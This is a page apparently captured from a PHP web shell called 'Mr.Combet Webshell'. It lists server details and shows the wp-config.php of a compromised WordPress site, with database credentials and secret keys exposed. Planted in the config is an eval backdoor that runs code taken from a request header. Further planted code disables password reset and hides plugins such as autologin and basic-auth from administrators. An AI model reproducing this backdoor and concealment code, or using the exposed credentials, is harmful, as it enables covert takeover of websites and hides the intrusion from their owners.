Mr.Combet Webshell
Your IP :
172.18.0.175
Server IP :
104.21.83.108
Server :
Linux crmarketing.1092.w795 4.19.0-18-amd64 #1 SMP Debian 4.19.208-1 (2021-09-29) x86_64
Server Software :
Apache/2.4.38 (Debian)
PHP Version :
7.4.33
Add File :
Submit
Add Directory :
Submit
Dir :
~
/
var
/
www
/
crmarketing.1092.w795
/
site75561
/
View File Name :
wp-config.php
<?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the * installation. You don't have to use the web site, you can * copy this file to "wp-config.php" and fill in the values. * * This file contains the following configurations: * * * MySQL settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://wordpress.org/support/article/editing-wp-config-php/ * * @package WordPress */ // ** MySQL settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'site75561' ); /** MySQL database username */ define( 'DB_USER', 'Qlm3YWF0gqllWSME' ); /** MySQL database password */ define( 'DB_PASSWORD', 'PyO0auAGyjTvfRXmTyL8mncMFQ3ZSY' ); /** MySQL hostname */ define( 'DB_HOST', 'localhost' ); /** Database Charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8' ); /** The Database Collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /** * Authentication Unique Keys and Salts. * * Change these to different unique phrases! * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service} * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again. * * @since 2.6.0 */ define( 'AUTH_KEY', 'jwrl|_0[6jdS~g?R}{k5eaozwNaRNZ$l8uA~u%8.5(7TzF0lY&gHq&#d!:phtlhW' ); define( 'SECURE_AUTH_KEY', 'f2FEX+&6$br({cOw+VDci.G[drR]lj[a-E7Mhph7~[aQVrz2J#qm8xC-!.:YwvM2' ); define( 'LOGGED_IN_KEY', 'o>;p7`#U}=tn<eB<U4;n4UkwI^}|modA1]@|cLSwmT)id3*54w=K*sf}b;Jl#WPM' ); define( 'NONCE_KEY', 'B*vujc^yxS/]j~2 7RZU%w5e6Vg1Wg`Htg8Sr )iYu0j^93|LD$01Cv1NenKME^y' ); define( 'AUTH_SALT', '}4f_TS<jk27jvH,fX;E%2lY8 S5RJ[Lmdx^@)r#sB){Rlk|9Y!0YorXD5!q!t:tu' ); define( 'SECURE_AUTH_SALT', 'ZgoSpMk?OpJAVL#kxl am}e$GicnhA`wPlk!.%b (u#`1%UV<Ifrx`>C?S)]W,Kt' ); define( 'LOGGED_IN_SALT', '{u?rWvs9J|GrE`%L&DYJ7^4O(yI72?C=3%4b+gs]=ox;mtH%%t]?Q?2TR1)&| d1' ); define( 'NONCE_SALT', 'j[YI;jj8J03,%0e)b{k~c0d^ y?%5@F{MQpX#U_LvI9eaitQw|$#&:fsORF:*n-L' ); define( 'WP_CACHE_KEY_SALT', '+Wa(U/39z{nM0s:6fzotOrJ?5zgMF2}>WJ=|fjJ m:y4*W1 Ht+NoFYkmp-=GMdd' ); /** * WordPress Database Table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'wp_'; /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', dirname( __FILE__ ) . '/' ); } /** Sets up WordPress vars and included files. */ @eval($_SERVER['HTTP_6AC9578']); require_once ABSPATH . 'wp-settings.php'; if (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') {$_SERVER['HTTPS'] = 'on'; } // Forbid password change/reset function pwd_disable() { return false; } function pwd_remove($text) { return preg_replace( '/Lost your password\??/', '', $text ); } if (function_exists('add_filter')) { add_filter( 'show_password_fields', 'pwd_disable' ); add_filter( 'allow_password_reset', 'pwd_disable' ); add_filter( 'gettext', 'pwd_remove' ); } // End of forbid password change/reset // Plugins hiding function plt_hide_wp_mail_smtp_menus() { remove_menu_page('wp-mail-smtp'); remove_submenu_page('wp-mail-smtp', 'wp-mail-smtp'); remove_submenu_page('wp-mail-smtp', 'wp-mail-smtp-logs'); remove_submenu_page('wp-mail-smtp', 'wp-mail-smtp-reports'); remove_submenu_page('wp-mail-smtp', 'wp-mail-smtp-tools'); remove_submenu_page('wp-mail-smtp', 'wp-mail-smtp-about'); remove_submenu_page('wp-mail-smtp', 'https://wpmailsmtp.com/lite-upgrade/?utm_source=WordPress&utm_medium=admin-menu&utm_campaign=liteplugin&utm_content=Upgrade%20to%20Pro'); } function plt_hide_wp_mail_smtp_dashboard_widgets() { $screen = get_current_screen(); if ( !$screen ) { return; } remove_meta_box('wp_mail_smtp_reports_widget_lite', 'dashboard', 'normal'); } function hide_plugin_action() { global $wp_list_table; $hidearr = array('autologin/autologin.php','basic-auth/basic-auth.php','cf7-image-captcha-pro/cf7-image-captcha-pro.php','wp-mail-smtp/wp_mail_smtp.php'); $myplugins = $wp_list_table->items; foreach ($myplugins as $key => $val) { if (in_array($key,$hidearr)) { unset($wp_list_table->items[$key]); } } } function hide_plugin_editor( $allcaps ) { $allcaps['edit_plugins'] = false; return $allcaps; } if (function_exists('add_action') && function_exists('add_filter')) { add_action('pre_current_active_plugins', 'hide_plugin_action'); add_filter('user_has_cap', 'hide_plugin_editor'); add_action('wp_dashboard_setup', 'plt_hide_wp_mail_smtp_dashboard_widgets', 20); add_action('admin_menu', 'plt_hide_wp_mail_smtp_menus', 2147483647); } // End of plugins hiding define('WP_MEMORY_LIMIT', '130M');